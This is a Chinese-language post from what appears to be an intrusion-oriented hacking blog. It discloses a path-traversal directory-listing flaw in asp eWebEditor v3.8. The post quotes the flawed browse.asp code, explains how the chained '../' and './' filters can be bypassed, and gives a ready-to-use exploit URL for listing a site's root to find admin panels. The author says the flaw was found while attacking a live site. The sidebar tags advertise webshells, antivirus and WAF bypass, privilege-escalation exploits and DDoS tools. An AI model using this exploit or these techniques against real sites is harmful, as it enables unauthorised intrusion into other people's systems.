WEBSHELL

今天是

关于我联系我网站地图

现在位置:首页 » 入侵笔记 » asp eWebEditor v3.8 列目录漏洞

asp eWebEditor v3.8 列目录漏洞
作者:T.H.E   分类:入侵笔记   评论(0)   浏览(1812)  

好久没发洞了,今天搞个站遇到了asp eWebEditor v3.8  随便挖掘了下,下面是成果,getshell的是没有,小洞还是发现了个!

标题:asp eWebEditor v3.8 列目录漏洞(其他版本为测试)
漏洞文件:asp/browse.asp
漏洞发生者:鬼哥
漏洞产生:

Sub InitParam() 

      sType = UCase(Trim(Request.QueryString("type"))) 

     sStyleName = Trim(Request.QueryString("style")) 

     sCusDir = Trim(Request.QueryString("cusdir")) 



     Dim i, aStyleConfig, bValidStyle 

     bValidStyle = False 

     For i = 1 To Ubound(aStyle) 

            aStyleConfig = Split(aStyle(i), "|||") 

              If Lcase(sStyleName) = Lcase(aStyleConfig(0)) Then 

                     bValidStyle = True 

                      Exit For 

            End If 

      Next 



      If bValidStyle = False Then 

              OutScript("alert('Invalid Style.')") 

      End If 

 

      sBaseUrl = aStyleConfig(19) 

      nAllowBrowse = CLng(aStyleConfig(43)) 

      nCusDirFlag = Clng(aStyleConfig(61)) 



      If nAllowBrowse <> 1 Then 

            OutScript("alert('Do not allow browse!')") 

       End If 

      If nCusDirFlag <> 1 Then 

          sCusDir = "" 

     Else 

              sCusDir = Replace(sCusDir, "\", "/") 
            If Left(sCusDir, 1) = "/" Or Left(sCusDir, 1) = "." Or Right(sCusDir, 1) = "." Or InStr(sCusDir, "./") > 0 Or      InStr(sCusDir, "/.") > 0 Or InStr(sCusDir, "//") > 0 Then 

                        sCusDir = "" 

           Else 

                     If Right(sCusDir, 1) <> "/" Then 

                          sCusDir = sCusDir & "/" 

                  End If 

            End If 

     End If 



     sUploadDir = aStyleConfig(3) 

     If Left(sUploadDir, 1) <> "/" Then 

           sUploadDir = "../" & sUploadDir 

    End If 



    Select Case sBaseUrl 

    Case "0" 

            sContentPath = aStyleConfig(23) 

    Case "1" 

            sContentPath = RelativePath2RootPath(sUploadDir) 

     Case "2" 

            sContentPath = RootPath2DomainPath(RelativePath2RootPath(sUploadDir)) 

     End Select 



     sUploadDir = sUploadDir & sCusDir 

   sContentPath = sContentPath & sCusDir 



 Select Case sType 

   Case "FILE" 
           sAllowExt = "" 

  Case "MEDIA" 

          sAllowExt = "rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov" 

 Case "FLASH" 

        sAllowExt = "swf" 

Case Else 

  sAllowExt = "bmp|jpg|jpeg|png|gif" 

End Select 



      sCurrDir = sUploadDir 
      sDir = Trim(Request("dir")) 

 '1.假设dir= ../ 

 '2.假设dir=...// 

 '3.假设dir=...../// 

        sDir = Replace(sDir, "\", "/")  '过滤1 

        sDir = Replace(sDir, "../", "") '过滤2 

 '1.到这里就被过滤了 

        sDir = Replace(sDir, "./", "") '过滤3 

 '2到这里也被功率了 

 '3到这里就成../了。比较有趣的饶过!好象不少cms这样过滤过。[/color] 

        If sDir <> "" Then 

              If CheckValidDir(Server.Mappath(sUploadDir & sDir)) = True Then 

                       sCurrDir = sUploadDir & sDir & "/" 

              Else 

                       sDir = "" 

             End If 

       End If 

 

End Sub 
漏洞测试EXP:asp/browses.asp?style=gray&dir=.....///.....//  饶过过滤直接列根目录(只能列图片已目录)可用于找后台等(利用exp在页面不会显示出目录来,得查看源文件).
鬼哥:我也不知道这个漏洞别人发现或者公布没,反正我在网上找了下没找到 asp eWebEditor v3.8的这个漏洞,,确实有php版的漏洞,但是asp的确实没。
转载请著名作者名“鬼哥”否则没JJ。

转载于:90sec 作者:鬼哥


    转载分享请注明原文地址(WEBSHELL):https://www.webshell.ren/post-209.html
分享本文至:

发表评论:

标签

  • 过狗总结
  • 免费资源
  • cms漏洞
  • 纯属扯淡
  • 渗透工具
  • 系统漏洞
  • 编辑器漏洞
  • 渗透教程
  • 提权exp分享
  • 站长资讯
  • 提权教程
  • 旁站工具
  • 一句话脚本
  • iis6写权限和遍历修复
  • 启动项目提权
  • 本人消失一段时间
  • asp大马后门
  • 搜狗问问存储型XSS
  • 批量discuz
  • 最新过狗菜刀
  • 7.2
  • 免杀pr
  • php读取iis配置脚本
  • 过安全宝
  • phpweb拿shell突破安全狗
  • Drupal
  • 实战某学校内网渗透
  • 7.31爆严重SQL注入漏洞【附exp】
  • 星外提权
  • windows
  • boot
  • manager
  • .htaccess
  • 301重定向
  • 免杀提权exp整理
  • 分享字典
  • 内网端口转发
  • 编辑器插一句话
  • wdcp虚拟主机管理系统
  • 过狗大马
  • CVE-2014-6332
  • 免费cdn加速
  • 附上exp
  • windows创建隐藏帐号
  • 指定渗透某大学
  • XYCMS漏洞整理
  • 内网渗透
  • emlog相册插件漏洞
  • 校园系统cms漏洞
  • Alan社工教程
  • 说明
  • pigcms&iwxcms漏洞利用工具
  • 批量上传黑页
  • IISPutScanner增强版
  • cc攻击防御
  • 椰树V1.9接口修复版
  • CVE-2014-3153
  • EXP
  • 搜索引擎分别CDN加速
  • MSSQL数据库提权
  • 新C段查询工具
  • 利用Apache解析漏洞拿下单子站
  • 内网渗透系列教程整理(原创)
  • 第一章节:讲解内网转发(原创)
  • sqlmap基本使用方法
  • 实战社工系列教程
  • cms漏洞集合
  • DDoS攻击
  • 12306信息泄密事件
  • 第二章节:内网域渗透(原创)
  • DDOS工具
  • wordpress上传漏洞
  • 支付宝自动转账支付代码
  • 突破SecureRDP拦截
  • 内网渗透第三章节1小节(原创)
  • 知名安全检测工具AWVSv9.5更新破解版本
  • 内网渗透第三章节0x2小节
  • 8.1权限提升漏洞POC
  • 渗透系列视频教程
  • 木马爆破工具集合
  • 记一次上传拿shell
  • 最新提星外主机系统思路(原创)
  • 过守护神总结
  • 对母校官方网站的一次渗透检测经历
  • 帝国CMS
  • 74CMS
  • 社会工程学系列
  • 文字语音调用代码
  • 法克论坛旁站查询工具
  • 数据泄露那些事情
  • Bitstamp
  • 翻墙网站
  • 黑掉ATM
  • aspcmsCSRF漏洞利用代码
  • 绕过各种CDN防护总结
  • 轻量级网站漏洞批量扫描器
  • 隐匿在Pastebin上的后门
  • 学校渗透系列一
  • ISIS黑客
  • SniffPass
  • -
  • 网络密码嗅探
  • 黑客组织“匿名者”
  • 谷歌把微软惹毛了
  • iPod
  • nano竟成ATM盗窃工具
  • 恶意软件可绕过密码
  • 马化腾QQ也曾被盗
  • 铁通被曝系统漏洞
  • Windows8.1漏洞
  • 白帽子借漏洞1元买几十万Model
  • Notepad++官网被圣战组织黑了
  • 苹果OSX的Spotlight文件搜索含泄漏用户隐私漏洞
  • 2014十大木马
  • 免费cdn加速整理
  • 韩国航空Facebook
  • Discuz!
  • X1.5前台getshell漏洞
  • 斯诺登又曝新料
  • 《英雄联盟》被曝植入木马
  • 2014年全球十大网络攻击事件
  • PolarSSL
  • 劫持301重定向快照流量
  • 过D盾的思路
  • 指定网站入侵
  • 比特币
  • 安全漏洞资讯
  • 黑客攻击
  • 自动批量SHELL一条龙
  • 域名爆破+Host查询
  • 黑客组织Anonymous
  • Burp
  • Suite
  • WordPress网站漏洞
  • 河马工具
  • kali系列教程
  • 网络资讯
  • MS15-077
  • MS15-051
  • 黑客交易吧2003渗透系统
  • 对国外黑客批量爆菊花
  • joomla反序列化漏洞
  • Dedecms延时注入漏洞
  • https
  • 安全狗
  • Nmap使用教程
  • linux
  • 工具收集
  • 腾讯安全网址拦截
  • 菜刀后门解析
    • 全球访问统计

        Free counters!
    • <-----------------------------------------------分界线----------------------------------------------->